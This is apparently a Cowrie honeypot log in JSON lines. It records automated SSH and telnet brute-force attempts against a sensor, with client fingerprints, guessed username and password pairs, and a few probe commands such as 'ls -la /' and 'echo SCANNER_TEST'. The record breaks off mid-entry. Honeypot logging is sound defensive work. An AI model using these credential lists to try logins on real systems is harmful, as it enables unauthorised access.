{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:55:57.817189Z","src_ip":"212.227.235.229","session":"32aca5a5d89c"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo123","message":"login attempt [odoo/odoo123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:56:02.674254Z","src_ip":"212.227.235.229","session":"32aca5a5d89c"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:56:04.833579Z","src_ip":"212.227.235.229","session":"32aca5a5d89c"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":48786,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e352711c43","protocol":"ssh","message":"New connection: 106.12.128.104:48786 (1.2.3.4:22) [session: 07e352711c43]","sensor":"my-vps","timestamp":"2025-08-26T22:56:52.456405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:56:52.457336Z","src_ip":"106.12.128.104","session":"07e352711c43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:56:56.795187Z","src_ip":"106.12.128.104","session":"07e352711c43"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:56:56.797081Z","src_ip":"106.12.128.104","session":"07e352711c43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33094,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c2921081548","protocol":"ssh","message":"New connection: 212.227.235.229:33094 (1.2.3.4:22) [session: 9c2921081548]","sensor":"my-vps","timestamp":"2025-08-26T22:58:21.989837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:58:23.477346Z","src_ip":"212.227.235.229","session":"9c2921081548"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:58:23.478229Z","src_ip":"212.227.235.229","session":"9c2921081548"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123qwe","message":"login attempt [odoo/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T22:58:28.395463Z","src_ip":"212.227.235.229","session":"9c2921081548"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:58:31.268632Z","src_ip":"212.227.235.229","session":"9c2921081548"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47182,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5c19a7ac4c2","protocol":"ssh","message":"New connection: 212.227.125.160:47182 (1.2.3.4:22) [session: e5c19a7ac4c2]","sensor":"my-vps","timestamp":"2025-08-26T22:58:39.253172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:58:39.253932Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:58:39.378511Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er45ty6","message":"login attempt [root/1qw23er45ty6] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:58:39.932633Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:58:40.201478Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T22:58:40.202209Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:58:40.336508Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:58:40.337592Z","src_ip":"212.227.125.160","session":"e5c19a7ac4c2"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":53778,"dst_ip":"1.2.3.4","dst_port":22,"session":"c840e11bf90e","protocol":"ssh","message":"New connection: 106.12.128.104:53778 (1.2.3.4:22) [session: c840e11bf90e]","sensor":"my-vps","timestamp":"2025-08-26T22:58:50.384984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:58:50.385910Z","src_ip":"106.12.128.104","session":"c840e11bf90e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60686,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f615571f9f8","protocol":"telnet","message":"New connection: 212.227.125.160:60686 (1.2.3.4:23) [session: 8f615571f9f8]","sensor":"my-vps","timestamp":"2025-08-26T22:59:02.754202Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:59:02.891056Z","src_ip":"212.227.125.160","session":"8f615571f9f8"}
{"eventid":"cowrie.session.closed","duration":2.6083946228027344,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:05.362525Z","src_ip":"212.227.125.160","session":"8f615571f9f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48670,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c0934a8f59d","protocol":"telnet","message":"New connection: 212.227.125.160:48670 (1.2.3.4:23) [session: 7c0934a8f59d]","sensor":"my-vps","timestamp":"2025-08-26T22:59:05.404192Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:59:05.555372Z","src_ip":"212.227.125.160","session":"7c0934a8f59d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:59:05.658877Z","src_ip":"212.227.125.160","session":"7c0934a8f59d"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T22:59:05.759415Z","src_ip":"212.227.125.160","session":"7c0934a8f59d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.7","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:08.320331Z","src_ip":"212.227.125.160","session":"7c0934a8f59d"}
{"eventid":"cowrie.session.closed","duration":2.9220662117004395,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:08.326197Z","src_ip":"212.227.125.160","session":"7c0934a8f59d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:59:12.052458Z","src_ip":"106.12.128.104","session":"c840e11bf90e"}
{"eventid":"cowrie.session.closed","duration":"21.7","message":"Connection lost after 21.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:12.054343Z","src_ip":"106.12.128.104","session":"c840e11bf90e"}
{"eventid":"cowrie.session.connect","src_ip":"94.154.35.157","src_port":22058,"dst_ip":"1.2.3.4","dst_port":23,"session":"fcd333f67e1d","protocol":"telnet","message":"New connection: 94.154.35.157:22058 (1.2.3.4:23) [session: fcd333f67e1d]","sensor":"my-vps","timestamp":"2025-08-26T22:59:37.536475Z"}
{"eventid":"cowrie.login.failed","username":"austinpowers","password":"dr3vil1999","message":"login attempt [austinpowers/dr3vil1999] failed","sensor":"my-vps","timestamp":"2025-08-26T22:59:42.769306Z","src_ip":"94.154.35.157","session":"fcd333f67e1d"}
{"eventid":"cowrie.session.closed","duration":6.054670810699463,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:43.591050Z","src_ip":"94.154.35.157","session":"fcd333f67e1d"}
{"eventid":"cowrie.session.connect","src_ip":"94.154.35.157","src_port":22072,"dst_ip":"1.2.3.4","dst_port":23,"session":"8fded20043cd","protocol":"telnet","message":"New connection: 94.154.35.157:22072 (1.2.3.4:23) [session: 8fded20043cd]","sensor":"my-vps","timestamp":"2025-08-26T22:59:43.637487Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:59:48.319084Z","src_ip":"94.154.35.157","session":"8fded20043cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:59:48.371414Z","src_ip":"94.154.35.157","session":"8fded20043cd"}
{"eventid":"cowrie.command.input","input":"echo ECHO_TEST_1756249189738462412","message":"CMD: echo ECHO_TEST_1756249189738462412","sensor":"my-vps","timestamp":"2025-08-26T22:59:49.764023Z","src_ip":"94.154.35.157","session":"8fded20043cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/05579484e7cd4a45c2f40f60ec89f6fbff983389359abf93b364353f1db09a3b","size":526,"shasum":"05579484e7cd4a45c2f40f60ec89f6fbff983389359abf93b364353f1db09a3b","duplicate":false,"duration":"3.3","message":"Closing TTY Log: var/lib/cowrie/tty/05579484e7cd4a45c2f40f60ec89f6fbff983389359abf93b364353f1db09a3b after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:51.705943Z","src_ip":"94.154.35.157","session":"8fded20043cd"}
{"eventid":"cowrie.session.closed","duration":8.073813199996948,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:59:51.711232Z","src_ip":"94.154.35.157","session":"8fded20043cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53361,"dst_ip":"1.2.3.4","dst_port":22,"session":"da8df92f69c6","protocol":"ssh","message":"New connection: 212.227.235.229:53361 (1.2.3.4:22) [session: da8df92f69c6]","sensor":"my-vps","timestamp":"2025-08-26T23:00:19.989804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T23:00:19.990895Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T23:00:20.096671Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"mummy","message":"login attempt [admin/mummy] failed","sensor":"my-vps","timestamp":"2025-08-26T23:00:20.600405Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"mowgli","message":"login attempt [admin/mowgli] failed","sensor":"my-vps","timestamp":"2025-08-26T23:00:21.708354Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"movers","message":"login attempt [admin/movers] failed","sensor":"my-vps","timestamp":"2025-08-26T23:00:22.817116Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"monkeyma","message":"login attempt [admin/monkeyma] failed","sensor":"my-vps","timestamp":"2025-08-26T23:00:23.925718Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"momsanaladventure","message":"login attempt [admin/momsanaladventure] failed","sensor":"my-vps","timestamp":"2025-08-26T23:00:25.033844Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:00:26.141697Z","src_ip":"212.227.235.229","session":"da8df92f69c6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49704,"dst_ip":"1.2.3.4","dst_port":22,"session":"14e2ce878ae2","protocol":"ssh","message":"New connection: 217.72.205.35:49704 (1.2.3.4:22) [session: 14e2ce878ae2]","sensor":"my-vps","timestamp":"2025-08-26T23:00:49.236352Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:00:49.237329Z","src_ip":"217.72.205.35","session":"14e2ce878ae2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45674,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c6979b9026","protocol":"ssh","message":"New connection: 212.227.235.229:45674 (1.2.3.4:22) [session: 41c6979b9026]","sensor":"my-vps","timestamp":"2025-08-26T23:00:52.209927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:00:53.556482Z","src_ip":"212.227.235.229","session":"41c6979b9026"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:00:53.557330Z","src_ip":"212.227.235.229","session":"41c6979b9026"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123qwerty","message":"login attempt [odoo/123qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T23:00:57.133152Z","src_ip":"212.227.235.229","session":"41c6979b9026"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:00:59.634890Z","src_ip":"212.227.235.229","session":"41c6979b9026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4221,"dst_ip":"1.2.3.4","dst_port":22,"session":"4723e21703b5","protocol":"ssh","message":"New connection: 212.227.125.160:4221 (1.2.3.4:22) [session: 4723e21703b5]","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.225120Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.226422Z","src_ip":"212.227.125.160","session":"4723e21703b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4483,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c50574eac5f","protocol":"ssh","message":"New connection: 212.227.125.160:4483 (1.2.3.4:22) [session: 6c50574eac5f]","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.335136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:02:23.336162Z","src_ip":"212.227.125.160","session":"6c50574eac5f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 